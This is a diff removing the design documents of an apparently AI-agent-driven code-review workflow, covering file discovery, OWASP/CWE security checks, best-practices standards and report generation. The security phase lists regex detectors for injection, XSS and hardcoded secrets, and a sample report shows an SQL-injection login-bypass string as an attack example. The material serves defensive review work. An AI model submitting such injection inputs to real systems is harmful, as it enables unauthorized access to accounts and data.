"reason": "Legacy code, scheduled for refactor"
}
}
}
}
```
## Roadmap
- [ ] AI-powered vulnerability detection
- [ ] Integration with popular security scanners (Snyk, SonarQube)
- [ ] Automated fix suggestions with diffs
- [ ] IDE plugins for real-time feedback
- [ ] Custom rule engine for organization-specific policies
## License
MIT License - See LICENSE file for details

View File

@@ -1,246 +0,0 @@
# Phase 1: Code Discovery & Scoping
## Objective
Discover and categorize all code files within the specified scope, preparing them for security analysis and best practices review.
## Input
- **User Arguments**:
- `--scope`: Directory or file patterns (default: entire project)
- `--languages`: Specific languages to review (e.g., typescript, python, java)
- `--exclude`: Patterns to exclude (e.g., test files, node_modules)
- **Configuration**: `.code-reviewer.json` (if exists)
## Process
### Step 1: Load Configuration
```javascript
// Check for project-level configuration
const configPath = path.join(projectRoot, '.code-reviewer.json');
const config = fileExists(configPath)
? JSON.parse(readFile(configPath))
: getDefaultConfig();
// Merge user arguments with config
const scope = args.scope || config.scope.include;
const exclude = args.exclude || config.scope.exclude;
const languages = args.languages || config.languages || 'auto';
```
### Step 2: Discover Files
Use MCP tools for efficient file discovery:
```javascript
// Use smart_search for file discovery
const files = await mcp__ccw_tools__smart_search({
action: "find_files",
pattern: scope,
includeHidden: false
});
// Apply exclusion patterns
const filteredFiles = files.filter(file => {
return !exclude.some(pattern => minimatch(file, pattern));
});
```
### Step 3: Categorize Files
Categorize files by:
- **Language/Framework**: TypeScript, Python, Java, Go, etc.
- **File Type**: Source, config, test, build
- **Priority**: Critical (auth, payment), High (API), Medium (utils), Low (docs)
```javascript
const inventory = {
critical: {
auth: ['src/auth/login.ts', 'src/auth/jwt.ts'],
payment: ['src/payment/stripe.ts'],
},
high: {
api: ['src/api/users.ts', 'src/api/orders.ts'],
database: ['src/db/queries.ts'],
},
medium: {
utils: ['src/utils/validator.ts'],
services: ['src/services/*.ts'],
},
low: {
types: ['src/types/*.ts'],
}
};
```
### Step 4: Extract Metadata
For each file, extract:
- **Lines of Code (LOC)**
- **Complexity Indicators**: Function count, class count
- **Dependencies**: Import statements
- **Framework Detection**: Express, React, Django, etc.
```javascript
const metadata = files.map(file => ({
path: file,
language: detectLanguage(file),
loc: countLines(file),
complexity: estimateComplexity(file),
framework: detectFramework(file),
priority: categorizePriority(file)
}));
```
## Output
### File Inventory
Save to `.code-review/inventory.json`:
```json
{
"scan_date": "2024-01-15T10:30:00Z",
"total_files": 247,
"by_language": {
"typescript": 185,
"python": 42,
"javascript": 15,
"go": 5
},
"by_priority": {
"critical": 12,
"high": 45,
"medium": 120,
"low": 70
},
"files": [
{
"path": "src/auth/login.ts",
"language": "typescript",
"loc": 245,
"functions": 8,
"classes": 2,
"priority": "critical",
"framework": "express",
"dependencies": ["bcrypt", "jsonwebtoken", "express"]
}
]
}
```
### Summary Report
```markdown
## Code Discovery Summary
**Scope**: src/**/*
**Total Files**: 247
**Languages**: TypeScript (75%), Python (17%), JavaScript (6%), Go (2%)
### Priority Distribution
- Critical: 12 files (authentication, payment processing)
- High: 45 files (API endpoints, database queries)
- Medium: 120 files (utilities, services)
- Low: 70 files (types, configs)
### Key Areas Identified
1. **Authentication Module** (src/auth/) - 12 files, 2,400 LOC
2. **Payment Processing** (src/payment/) - 5 files, 1,200 LOC
3. **API Layer** (src/api/) - 35 files, 5,600 LOC
4. **Database Layer** (src/db/) - 8 files, 1,800 LOC
**Next Phase**: Security Analysis on Critical + High priority files
```
## State Management
Save phase state for potential resume:
```json
{
"phase": "01-code-discovery",
"status": "completed",
"timestamp": "2024-01-15T10:35:00Z",
"output": {
"inventory_path": ".code-review/inventory.json",
"total_files": 247,
"critical_files": 12,
"high_files": 45
}
}
```
## Agent Instructions
```markdown
You are in Phase 1 of the Code Review workflow. Your task is to discover and categorize code files.
**Instructions**:
1. Use mcp__ccw_tools__smart_search with action="find_files" to discover files
2. Apply exclusion patterns from config or arguments
3. Categorize files by language, type, and priority
4. Extract basic metadata (LOC, complexity indicators)
5. Save inventory to .code-review/inventory.json
6. Generate summary report
7. Proceed to Phase 2 with critical + high priority files
**Tools Available**:
- mcp__ccw_tools__smart_search (file discovery)
- Read (read configuration and sample files)
- Write (save inventory and reports)
**Output Requirements**:
- inventory.json with complete file list and metadata
- Summary markdown report
- State file for phase tracking
```
## Error Handling
### No Files Found
```javascript
if (filteredFiles.length === 0) {
throw new Error(`No files found matching scope: ${scope}
Suggestions:
- Check if scope pattern is correct
- Verify exclude patterns are not too broad
- Ensure project has code files in specified scope
`);
}
```
### Large Codebase
```javascript
if (filteredFiles.length > 1000) {
console.warn(`⚠️ Large codebase detected (${filteredFiles.length} files)`);
console.log(`Consider using --scope to review in batches`);
// Offer to focus on critical/high priority only
const answer = await askUser("Review critical/high priority files only?");
if (answer === 'yes') {
filteredFiles = filteredFiles.filter(f =>
f.priority === 'critical' || f.priority === 'high'
);
}
}
```
## Validation
Before proceeding to Phase 2:
- ✅ Inventory file created
- ✅ At least one file categorized as critical or high priority
- ✅ Metadata extracted for all files
- ✅ Summary report generated
- ✅ State saved for resume capability
## Next Phase
**Phase 2: Security Analysis** - Analyze critical and high priority files for security vulnerabilities using OWASP Top 10 and CWE Top 25 checks.

View File

@@ -1,442 +0,0 @@
# Phase 2: Security Analysis
## Objective
Analyze code files for security vulnerabilities based on OWASP Top 10, CWE Top 25, and language-specific security patterns.
## Input
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
- **Priority Focus**: Critical and High priority files (unless `--scope all`)
- **User Arguments**:
- `--focus security`: Security-only mode
- `--severity critical,high,medium,low`: Minimum severity to report
- `--checks`: Specific security checks to run (e.g., sql-injection, xss)
## Process
### Step 1: Load Security Rules
```javascript
// Load security check definitions
const securityRules = {
owasp_top_10: [
'injection',
'broken_authentication',
'sensitive_data_exposure',
'xxe',
'broken_access_control',
'security_misconfiguration',
'xss',
'insecure_deserialization',
'vulnerable_components',
'insufficient_logging'
],
cwe_top_25: [
'cwe-79', // XSS
'cwe-89', // SQL Injection
'cwe-20', // Improper Input Validation
'cwe-78', // OS Command Injection
'cwe-190', // Integer Overflow
// ... more CWE checks
]
};
// Load language-specific rules
const languageRules = {
typescript: require('./rules/typescript-security.json'),
python: require('./rules/python-security.json'),
java: require('./rules/java-security.json'),
go: require('./rules/go-security.json'),
};
```
### Step 2: Analyze Files for Vulnerabilities
For each file in the inventory, perform security analysis:
```javascript
const findings = [];
for (const file of inventory.files) {
if (file.priority !== 'critical' && file.priority !== 'high') continue;
// Read file content
const content = await Read({ file_path: file.path });
// Run security checks
const fileFindings = await runSecurityChecks(content, file, {
rules: securityRules,
languageRules: languageRules[file.language],
severity: args.severity || 'medium'
});
findings.push(...fileFindings);
}
```
### Step 3: Security Check Patterns
#### A. Injection Vulnerabilities
**SQL Injection**:
```javascript
// Pattern: String concatenation in SQL queries
const sqlInjectionPatterns = [
/\$\{.*\}.*SELECT/, // Template literal with SELECT
/"SELECT.*\+\s*\w+/, // String concatenation
/execute\([`'"].*\$\{.*\}.*[`'"]\)/, // Parameterized query bypass
/query\(.*\+.*\)/, // Query concatenation
];
// Check code
for (const pattern of sqlInjectionPatterns) {
const matches = content.matchAll(new RegExp(pattern, 'g'));
for (const match of matches) {
findings.push({
type: 'sql-injection',
severity: 'critical',
line: getLineNumber(content, match.index),
code: match[0],
file: file.path,
message: 'Potential SQL injection vulnerability',
recommendation: 'Use parameterized queries or ORM methods',
cwe: 'CWE-89',
owasp: 'A03:2021 - Injection'
});
}
}
```
**Command Injection**:
```javascript
// Pattern: Unsanitized input in exec/spawn
const commandInjectionPatterns = [
/exec\(.*\$\{.*\}/, // exec with template literal
/spawn\(.*,\s*\[.*\$\{.*\}.*\]\)/, // spawn with unsanitized args
/execSync\(.*\+.*\)/, // execSync with concatenation
];
```
**XSS (Cross-Site Scripting)**:
```javascript
// Pattern: Unsanitized user input in DOM/HTML
const xssPatterns = [
/innerHTML\s*=.*\$\{.*\}/, // innerHTML with template literal
/dangerouslySetInnerHTML/, // React dangerous prop
/document\.write\(.*\)/, // document.write
/<\w+.*\$\{.*\}.*>/, // JSX with unsanitized data
];
```
#### B. Authentication & Authorization
```javascript
// Pattern: Weak authentication
const authPatterns = [
/password\s*===?\s*['"]/, // Hardcoded password comparison
/jwt\.sign\(.*,\s*['"][^'"]{1,16}['"]\)/, // Weak JWT secret
/bcrypt\.hash\(.*,\s*[1-9]\s*\)/, // Low bcrypt rounds
/md5\(.*password.*\)/, // MD5 for passwords
/if\s*\(\s*user\s*\)\s*\{/, // Missing auth check
];
// Check for missing authorization
const authzPatterns = [
/router\.(get|post|put|delete)\(.*\)\s*=>/, // No middleware
/app\.use\([^)]*\)\s*;(?!.*auth)/, // Missing auth middleware
];
```
#### C. Sensitive Data Exposure
```javascript
// Pattern: Sensitive data in logs/responses
const sensitiveDataPatterns = [
/(password|secret|token|key)\s*:/i, // Sensitive keys in objects
/console\.log\(.*password.*\)/i, // Password in logs
/res\.send\(.*user.*password.*\)/, // Password in response
/(api_key|apikey)\s*=\s*['"]/i, // Hardcoded API keys
];
```
#### D. Security Misconfiguration
```javascript
// Pattern: Insecure configurations
const misconfigPatterns = [
/cors\(\{.*origin:\s*['"]?\*['"]?.*\}\)/, // CORS wildcard
/https?\s*:\s*false/, // HTTPS disabled
/helmet\(\)/, // Missing helmet config
/strictMode\s*:\s*false/, // Strict mode disabled
];
```
### Step 4: Language-Specific Checks
**TypeScript/JavaScript**:
```javascript
const jsFindings = [
checkPrototypePollution(content),
checkEvalUsage(content),
checkUnsafeRegex(content),
checkWeakCrypto(content),
];
```
**Python**:
```javascript
const pythonFindings = [
checkPickleVulnerabilities(content),
checkYamlUnsafeLoad(content),
checkSqlAlchemy(content),
checkFlaskSecurityHeaders(content),
];
```
**Java**:
```javascript
const javaFindings = [
checkDeserialization(content),
checkXXE(content),
checkPathTraversal(content),
checkSQLInjection(content),
];
```
**Go**:
```javascript
const goFindings = [
checkRaceConditions(content),
checkSQLInjection(content),
checkPathTraversal(content),
checkCryptoWeakness(content),
];
```
## Output
### Security Findings File
Save to `.code-review/security-findings.json`:
```json
{
"scan_date": "2024-01-15T11:00:00Z",
"total_findings": 24,
"by_severity": {
"critical": 3,
"high": 8,
"medium": 10,
"low": 3
},
"by_category": {
"injection": 5,
"authentication": 3,
"data_exposure": 4,
"misconfiguration": 6,
"xss": 3,
"other": 3
},
"findings": [
{
"id": "SEC-001",
"type": "sql-injection",
"severity": "critical",
"file": "src/auth/user-service.ts",
"line": 145,
"column": 12,
"code": "const query = `SELECT * FROM users WHERE username = '${username}'`;",
"message": "SQL Injection vulnerability: User input directly concatenated in SQL query",
"cwe": "CWE-89",
"owasp": "A03:2021 - Injection",
"recommendation": {
"description": "Use parameterized queries to prevent SQL injection",
"fix_example": "const query = 'SELECT * FROM users WHERE username = ?';\ndb.execute(query, [username]);"
},
"references": [
"https://owasp.org/www-community/attacks/SQL_Injection",
"https://cwe.mitre.org/data/definitions/89.html"
]
}
]
}
```
### Security Report
Generate markdown report:
```markdown
# Security Analysis Report
**Scan Date**: 2024-01-15 11:00:00
**Files Analyzed**: 57 (Critical + High priority)
**Total Findings**: 24
## Severity Summary
| Severity | Count | Percentage |
|----------|-------|------------|
| Critical | 3 | 12.5% |
| High | 8 | 33.3% |
| Medium | 10 | 41.7% |
| Low | 3 | 12.5% |
## Critical Findings (Requires Immediate Action)
### 🔴 [SEC-001] SQL Injection in User Authentication
**File**: `src/auth/user-service.ts:145`
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
**Vulnerable Code**:
\`\`\`typescript
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
const user = await db.execute(query);
\`\`\`
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands.
**Attack Example**:
\`\`\`
username: ' OR '1'='1' --
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
Effect: Bypasses authentication, returns all users
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Use parameterized queries
const query = 'SELECT * FROM users WHERE username = ?';
const user = await db.execute(query, [username]);
// Or use ORM
const user = await User.findOne({ where: { username } });
\`\`\`
**References**:
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
---
### 🔴 [SEC-002] Hardcoded JWT Secret
**File**: `src/auth/jwt.ts:23`
**CWE**: CWE-798 | **OWASP**: A07:2021 - Identification and Authentication Failures
**Vulnerable Code**:
\`\`\`typescript
const token = jwt.sign(payload, 'mysecret123', { expiresIn: '1h' });
\`\`\`
**Issue**: JWT secret is hardcoded and weak (only 11 characters).
**Recommended Fix**:
\`\`\`typescript
// Use environment variable with strong secret
const token = jwt.sign(payload, process.env.JWT_SECRET, {
expiresIn: '1h',
algorithm: 'HS256'
});
// Generate strong secret (32+ bytes):
// node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"
\`\`\`
---
## High Findings
### 🟠 [SEC-003] Missing Input Validation
**File**: `src/api/users.ts:67`
**CWE**: CWE-20 | **OWASP**: A03:2021 - Injection
...
## Medium Findings
...
## Remediation Priority
1. **Critical (3)**: Fix within 24 hours
2. **High (8)**: Fix within 1 week
3. **Medium (10)**: Fix within 1 month
4. **Low (3)**: Fix in next release
## Compliance Impact
- **PCI DSS**: 4 findings affect compliance (SEC-001, SEC-002, SEC-008, SEC-011)
- **HIPAA**: 2 findings affect compliance (SEC-005, SEC-009)
- **GDPR**: 3 findings affect compliance (SEC-002, SEC-005, SEC-007)
```
## State Management
```json
{
"phase": "02-security-analysis",
"status": "completed",
"timestamp": "2024-01-15T11:15:00Z",
"input": {
"inventory_path": ".code-review/inventory.json",
"files_analyzed": 57
},
"output": {
"findings_path": ".code-review/security-findings.json",
"total_findings": 24,
"critical_count": 3,
"high_count": 8
}
}
```
## Agent Instructions
```markdown
You are in Phase 2 of the Code Review workflow. Your task is to analyze code for security vulnerabilities.
**Instructions**:
1. Load file inventory from Phase 1
2. Focus on Critical + High priority files
3. Run security checks for:
- OWASP Top 10 vulnerabilities
- CWE Top 25 weaknesses
- Language-specific security patterns
4. Use smart_search with mode="ripgrep" for pattern matching
5. Use mcp__ace-tool__search_context for semantic security pattern discovery
6. Classify findings by severity (Critical/High/Medium/Low)
7. Generate security-findings.json and markdown report
8. Proceed to Phase 3 (Best Practices Review)
**Tools Available**:
- mcp__ccw_tools__smart_search (pattern search)
- mcp__ace-tool__search_context (semantic search)
- Read (read file content)
- Write (save findings and reports)
- Grep (targeted pattern matching)
**Output Requirements**:
- security-findings.json with detailed findings
- Security report in markdown format
- Each finding must include: file, line, severity, CWE, OWASP, fix recommendation
- State file for phase tracking
```
## Validation
Before proceeding to Phase 3:
- ✅ All Critical + High priority files analyzed
- ✅ Findings categorized by severity
- ✅ Each finding has fix recommendation
- ✅ CWE and OWASP mappings included
- ✅ Security report generated
- ✅ State saved
## Next Phase
**Phase 3: Best Practices Review** - Analyze code quality, performance, and maintainability issues.

View File

@@ -1,36 +0,0 @@
# Phase 3: Best Practices Review
## Objective
Analyze code for best practices violations including code quality, performance issues, and maintainability concerns.
## Input
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
- **Security Findings**: From Phase 2 (`.code-review/security-findings.json`)
- **User Arguments**:
- `--focus best-practices`: Best practices only mode
- `--check quality,performance,maintainability`: Specific areas to check
## Process
### Step 1: Code Quality Analysis
Check naming conventions, function complexity, code duplication, and dead code detection.
### Step 2: Performance Analysis
Detect N+1 queries, inefficient algorithms, and memory leaks.
### Step 3: Maintainability Analysis
Check documentation coverage, test coverage, and dependency management.
## Output
- best-practices-findings.json
- Markdown report with recommendations
## Next Phase
**Phase 4: Report Generation**

View File

@@ -1,278 +0,0 @@
# Phase 4: Report Generation
## Objective
Consolidate security and best practices findings into a comprehensive, actionable code review report.
## Input
- **Security Findings**: `.code-review/security-findings.json`
- **Best Practices Findings**: `.code-review/best-practices-findings.json`
- **File Inventory**: `.code-review/inventory.json`
## Process
### Step 1: Load All Findings
```javascript
const securityFindings = JSON.parse(
await Read({ file_path: '.code-review/security-findings.json' })
);
const bestPracticesFindings = JSON.parse(
await Read({ file_path: '.code-review/best-practices-findings.json' })
);
const inventory = JSON.parse(
await Read({ file_path: '.code-review/inventory.json' })
);
```
### Step 2: Aggregate Statistics
```javascript
const stats = {
total_files_reviewed: inventory.total_files,
total_findings: securityFindings.total_findings + bestPracticesFindings.total_findings,
by_severity: {
critical: securityFindings.by_severity.critical,
high: securityFindings.by_severity.high + bestPracticesFindings.by_severity.high,
medium: securityFindings.by_severity.medium + bestPracticesFindings.by_severity.medium,
low: securityFindings.by_severity.low + bestPracticesFindings.by_severity.low,
},
by_category: {
security: securityFindings.total_findings,
code_quality: bestPracticesFindings.by_category.code_quality,
performance: bestPracticesFindings.by_category.performance,
maintainability: bestPracticesFindings.by_category.maintainability,
}
};
```
### Step 3: Generate Comprehensive Report
```markdown
# Comprehensive Code Review Report
**Generated**: {timestamp}
**Scope**: {scope}
**Files Reviewed**: {total_files}
**Total Findings**: {total_findings}
## Executive Summary
{Provide high-level overview of code health}
### Risk Assessment
{Calculate risk score based on findings}
### Compliance Status
{Map findings to compliance requirements}
## Detailed Findings
{Merge and organize security + best practices findings}
## Action Plan
{Prioritized list of fixes with effort estimates}
## Appendix
{Technical details, references, configuration}
```
### Step 4: Generate Fix Tracking Checklist
Create actionable checklist for developers:
```markdown
# Code Review Fix Checklist
## Critical Issues (Fix Immediately)
- [ ] [SEC-001] SQL Injection in src/auth/user-service.ts:145
- [ ] [SEC-002] Hardcoded JWT Secret in src/auth/jwt.ts:23
- [ ] [SEC-003] XSS Vulnerability in src/api/comments.ts:89
## High Priority Issues (Fix This Week)
- [ ] [SEC-004] Missing Authorization Check in src/api/admin.ts:34
- [ ] [BP-001] N+1 Query Pattern in src/api/orders.ts:45
...
```
### Step 5: Generate Metrics Dashboard
```markdown
## Code Health Metrics
### Security Score: 68/100
- Critical Issues: 3 (-30 points)
- High Issues: 8 (-2 points each)
### Code Quality Score: 75/100
- High Complexity Functions: 2
- Code Duplication: 5%
- Dead Code: 3 instances
### Performance Score: 82/100
- N+1 Queries: 3
- Inefficient Algorithms: 2
### Maintainability Score: 70/100
- Documentation Coverage: 65%
- Test Coverage: 72%
- Missing Tests: 5 files
```
## Output
### Main Report
Save to `.code-review/REPORT.md`:
- Executive summary
- Detailed findings (security + best practices)
- Action plan with priorities
- Metrics and scores
- References and compliance mapping
### Fix Checklist
Save to `.code-review/FIX-CHECKLIST.md`:
- Organized by severity
- Checkboxes for tracking
- File:line references
- Effort estimates
### JSON Summary
Save to `.code-review/summary.json`:
```json
{
"report_date": "2024-01-15T12:00:00Z",
"scope": "src/**/*",
"statistics": {
"total_files": 247,
"total_findings": 69,
"by_severity": { "critical": 3, "high": 13, "medium": 30, "low": 23 },
"by_category": {
"security": 24,
"code_quality": 18,
"performance": 12,
"maintainability": 15
}
},
"scores": {
"security": 68,
"code_quality": 75,
"performance": 82,
"maintainability": 70,
"overall": 74
},
"risk_level": "MEDIUM",
"action_required": true
}
```
## Report Template
Full report includes:
1. **Executive Summary**
- Overall code health
- Risk assessment
- Key recommendations
2. **Security Findings** (from Phase 2)
- Critical/High/Medium/Low
- OWASP/CWE mappings
- Fix recommendations with code examples
3. **Best Practices Findings** (from Phase 3)
- Code quality issues
- Performance concerns
- Maintainability gaps
4. **Metrics Dashboard**
- Security score
- Code quality score
- Performance score
- Maintainability score
5. **Action Plan**
- Immediate actions (critical)
- Short-term (1 week)
- Medium-term (1 month)
- Long-term (3 months)
6. **Compliance Impact**
- PCI DSS findings
- HIPAA findings
- GDPR findings
- SOC 2 findings
7. **Appendix**
- Full findings list
- Configuration used
- Tools and versions
- References
## State Management
```json
{
"phase": "04-report-generation",
"status": "completed",
"timestamp": "2024-01-15T12:00:00Z",
"input": {
"security_findings": ".code-review/security-findings.json",
"best_practices_findings": ".code-review/best-practices-findings.json"
},
"output": {
"report": ".code-review/REPORT.md",
"checklist": ".code-review/FIX-CHECKLIST.md",
"summary": ".code-review/summary.json"
}
}
```
## Agent Instructions
```markdown
You are in Phase 4 (FINAL) of the Code Review workflow. Generate comprehensive report.
**Instructions**:
1. Load security findings from Phase 2
2. Load best practices findings from Phase 3
3. Aggregate statistics and calculate scores
4. Generate comprehensive markdown report
5. Create fix tracking checklist
6. Generate JSON summary
7. Inform user of completion and output locations
**Tools Available**:
- Read (load findings)
- Write (save reports)
**Output Requirements**:
- REPORT.md (comprehensive markdown report)
- FIX-CHECKLIST.md (actionable checklist)
- summary.json (machine-readable summary)
- All files in .code-review/ directory
```
## Validation
- ✅ All findings consolidated
- ✅ Scores calculated
- ✅ Action plan generated
- ✅ Reports saved to .code-review/
- ✅ User notified of completion
## Completion
Code review complete! Outputs available in `.code-review/` directory.

View File

@@ -1,346 +0,0 @@
# Best Practices Requirements Specification
## Code Quality Standards
### Naming Conventions
**TypeScript/JavaScript**:
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
- Functions/Methods: camelCase (`getUserById`, `validateEmail`)
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`, `API_BASE_URL`)
- Private properties: prefix with `_` or `#` (`_cache`, `#secretKey`)
**Python**:
- Classes: PascalCase (`UserService`, `DatabaseConnection`)
- Functions: snake_case (`get_user_by_id`, `validate_email`)
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
- Private: prefix with `_` (`_internal_cache`)
**Java**:
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
- Methods: camelCase (`getUserById`, `validateEmail`)
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
- Packages: lowercase (`com.example.service`)
### Function Complexity
**Cyclomatic Complexity Thresholds**:
- **Low**: 1-5 (simple functions, easy to test)
- **Medium**: 6-10 (acceptable, well-structured)
- **High**: 11-20 (needs refactoring)
- **Very High**: 21+ (critical, must refactor)
**Calculation**:
```
Complexity = 1 (base)
+ count(if)
+ count(else if)
+ count(while)
+ count(for)
+ count(case)
+ count(catch)
+ count(&&)
+ count(||)
+ count(? :)
```
### Code Duplication
**Thresholds**:
- **Acceptable**: < 3% duplication
- **Warning**: 3-5% duplication
- **Critical**: > 5% duplication
**Detection**:
- Minimum block size: 5 lines
- Similarity threshold: 85%
- Ignore: Comments, imports, trivial getters/setters
### Dead Code Detection
**Targets**:
- Unused imports
- Unused variables/functions (not exported)
- Unreachable code (after return/throw)
- Commented-out code blocks (> 5 lines)
## Performance Standards
### N+1 Query Prevention
**Anti-patterns**:
```javascript
// ❌ N+1 Query
for (const order of orders) {
const user = await User.findById(order.userId);
}
// ✅ Batch Query
const userIds = orders.map(o => o.userId);
const users = await User.findByIds(userIds);
```
### Algorithm Efficiency
**Common Issues**:
- Nested loops (O(n²)) when O(n) possible
- Array.indexOf in loop → use Set.has()
- Array.filter().length → use Array.some()
- Multiple array iterations → combine into one pass
**Acceptable Complexity**:
- **O(1)**: Ideal for lookups
- **O(log n)**: Good for search
- **O(n)**: Acceptable for linear scan
- **O(n log n)**: Acceptable for sorting
- **O(n²)**: Avoid if possible, document if necessary
### Memory Leak Prevention
**Common Issues**:
- Event listeners without cleanup
- setInterval without clearInterval
- Global variable accumulation
- Circular references
- Large array/object allocations
**Patterns**:
```javascript
// ❌ Memory Leak
element.addEventListener('click', handler);
// No cleanup
// ✅ Proper Cleanup
useEffect(() => {
element.addEventListener('click', handler);
return () => element.removeEventListener('click', handler);
}, []);
```
### Resource Cleanup
**Required Cleanup**:
- Database connections
- File handles
- Network sockets
- Timers (setTimeout, setInterval)
- Event listeners
## Maintainability Standards
### Documentation Requirements
**Required for**:
- All exported functions/classes
- Public APIs
- Complex algorithms
- Non-obvious business logic
**JSDoc Format**:
```javascript
/**
* Validates user credentials and generates JWT token
*
* @param {string} username - User's username or email
* @param {string} password - Plain text password
* @returns {Promise<{token: string, expiresAt: Date}>} JWT token and expiration
* @throws {AuthenticationError} If credentials are invalid
*
* @example
* const {token} = await authenticateUser('john@example.com', 'secret123');
*/
async function authenticateUser(username, password) {
// ...
}
```
**Coverage Targets**:
- Critical modules: 100%
- High priority: 90%
- Medium priority: 70%
- Low priority: 50%
### Test Coverage Requirements
**Coverage Targets**:
- Unit tests: 80% line coverage
- Integration tests: Key workflows covered
- E2E tests: Critical user paths covered
**Required Tests**:
- All exported functions
- All public methods
- Error handling paths
- Edge cases
**Test File Convention**:
```
src/auth/login.ts
→ src/auth/login.test.ts (unit)
→ src/auth/login.integration.test.ts (integration)
```
### Dependency Management
**Best Practices**:
- Pin major versions (`"^1.2.3"` not `"*"`)
- Avoid 0.x versions in production
- Regular security audits (npm audit, snyk)
- Keep dependencies up-to-date
- Minimize dependency count
**Version Pinning**:
```json
{
"dependencies": {
"express": "^4.18.0", // ✅ Pinned major version
"lodash": "*", // ❌ Wildcard
"legacy-lib": "^0.5.0" // ⚠️ Unstable 0.x
}
}
```
### Magic Numbers
**Definition**: Numeric literals without clear meaning
**Anti-patterns**:
```javascript
// ❌ Magic numbers
if (user.age > 18) { }
setTimeout(() => {}, 5000);
buffer = new Array(1048576);
// ✅ Named constants
const LEGAL_AGE = 18;
const RETRY_DELAY_MS = 5000;
const BUFFER_SIZE_1MB = 1024 * 1024;
if (user.age > LEGAL_AGE) { }
setTimeout(() => {}, RETRY_DELAY_MS);
buffer = new Array(BUFFER_SIZE_1MB);
```
**Exceptions** (acceptable magic numbers):
- 0, 1, -1 (common values)
- 100, 1000 (obvious scaling factors in context)
- HTTP status codes (200, 404, 500)
## Error Handling Standards
### Required Error Handling
**Categories**:
- Network errors (timeout, connection failure)
- Database errors (query failure, constraint violation)
- Validation errors (invalid input)
- Authentication/Authorization errors
**Anti-patterns**:
```javascript
// ❌ Silent failure
try {
await saveUser(user);
} catch (err) {
// Empty catch
}
// ❌ Generic catch
try {
await processPayment(order);
} catch (err) {
console.log('Error'); // No details
}
// ✅ Proper handling
try {
await processPayment(order);
} catch (err) {
logger.error('Payment processing failed', { orderId: order.id, error: err });
throw new PaymentError('Failed to process payment', { cause: err });
}
```
### Logging Standards
**Required Logs**:
- Authentication attempts (success/failure)
- Authorization failures
- Data modifications (create/update/delete)
- External API calls
- Errors and exceptions
**Log Levels**:
- **ERROR**: System errors, exceptions
- **WARN**: Recoverable issues, deprecations
- **INFO**: Business events, state changes
- **DEBUG**: Detailed troubleshooting info
**Sensitive Data**:
- Never log: passwords, tokens, credit cards, SSNs
- Hash/mask: emails, IPs, usernames (in production)
## Code Structure Standards
### File Organization
**Max File Size**: 300 lines (excluding tests)
**Max Function Size**: 50 lines
**Module Structure**:
```
module/
├── index.ts # Public exports
├── types.ts # Type definitions
├── constants.ts # Constants
├── utils.ts # Utilities
├── service.ts # Business logic
└── service.test.ts # Tests
```
### Import Organization
**Order**:
1. External dependencies
2. Internal modules (absolute imports)
3. Relative imports
4. Type imports (TypeScript)
```typescript
// ✅ Organized imports
import express from 'express';
import { Logger } from 'winston';
import { UserService } from '@/services/user';
import { config } from '@/config';
import { validateEmail } from './utils';
import { UserRepository } from './repository';
import type { User, UserCreateInput } from './types';
```
## Scoring System
### Overall Score Calculation
```
Overall Score = (
Security Score × 0.4 +
Code Quality Score × 0.25 +
Performance Score × 0.2 +
Maintainability Score × 0.15
)
Security = 100 - (Critical × 30 + High × 2 + Medium × 0.5)
Code Quality = 100 - (violations / total_checks × 100)
Performance = 100 - (issues / potential_issues × 100)
Maintainability = (doc_coverage × 0.4 + test_coverage × 0.4 + dependency_health × 0.2)
```
### Risk Levels
- **LOW**: Score 90-100
- **MEDIUM**: Score 70-89
- **HIGH**: Score 50-69
- **CRITICAL**: Score < 50

View File

@@ -1,252 +0,0 @@
# Quality Standards
## Overall Quality Metrics
### Quality Score Formula
```
Overall Quality = (
Correctness × 0.30 +
Security × 0.25 +
Maintainability × 0.20 +
Performance × 0.15 +
Documentation × 0.10
)
```
### Score Ranges
| Range | Grade | Description |
|-------|-------|-------------|
| 90-100 | A | Excellent - Production ready |
| 80-89 | B | Good - Minor improvements needed |
| 70-79 | C | Acceptable - Some issues to address |
| 60-69 | D | Poor - Significant improvements required |
| 0-59 | F | Failing - Major issues, not production ready |
## Review Completeness
### Mandatory Checks
**Security**:
- ✅ OWASP Top 10 coverage
- ✅ CWE Top 25 coverage
- ✅ Language-specific security patterns
- ✅ Dependency vulnerability scan
**Code Quality**:
- ✅ Naming convention compliance
- ✅ Complexity analysis
- ✅ Code duplication detection
- ✅ Dead code identification
**Performance**:
- ✅ N+1 query detection
- ✅ Algorithm efficiency check
- ✅ Memory leak detection
- ✅ Resource cleanup verification
**Maintainability**:
- ✅ Documentation coverage
- ✅ Test coverage analysis
- ✅ Dependency health check
- ✅ Error handling review
## Reporting Standards
### Finding Requirements
Each finding must include:
- **Unique ID**: SEC-001, BP-001, etc.
- **Type**: Specific issue type (sql-injection, high-complexity, etc.)
- **Severity**: Critical, High, Medium, Low
- **Location**: File path and line number
- **Code Snippet**: Vulnerable/problematic code
- **Message**: Clear description of the issue
- **Recommendation**: Specific fix guidance
- **Example**: Before/after code example
### Report Structure
**Executive Summary**:
- High-level overview
- Risk assessment
- Key statistics
- Compliance status
**Detailed Findings**:
- Organized by severity
- Grouped by category
- Full details for each finding
**Action Plan**:
- Prioritized fix list
- Effort estimates
- Timeline recommendations
**Metrics Dashboard**:
- Quality scores
- Trend analysis (if historical data)
- Compliance status
**Appendix**:
- Full findings list
- Configuration details
- Tool versions
- References
## Output File Standards
### File Naming
```
.code-review/
├── inventory.json # File inventory
├── security-findings.json # Security findings
├── best-practices-findings.json # Best practices findings
├── summary.json # Summary statistics
├── REPORT.md # Main report
├── FIX-CHECKLIST.md # Action checklist
└── state.json # Session state
```
### JSON Schema
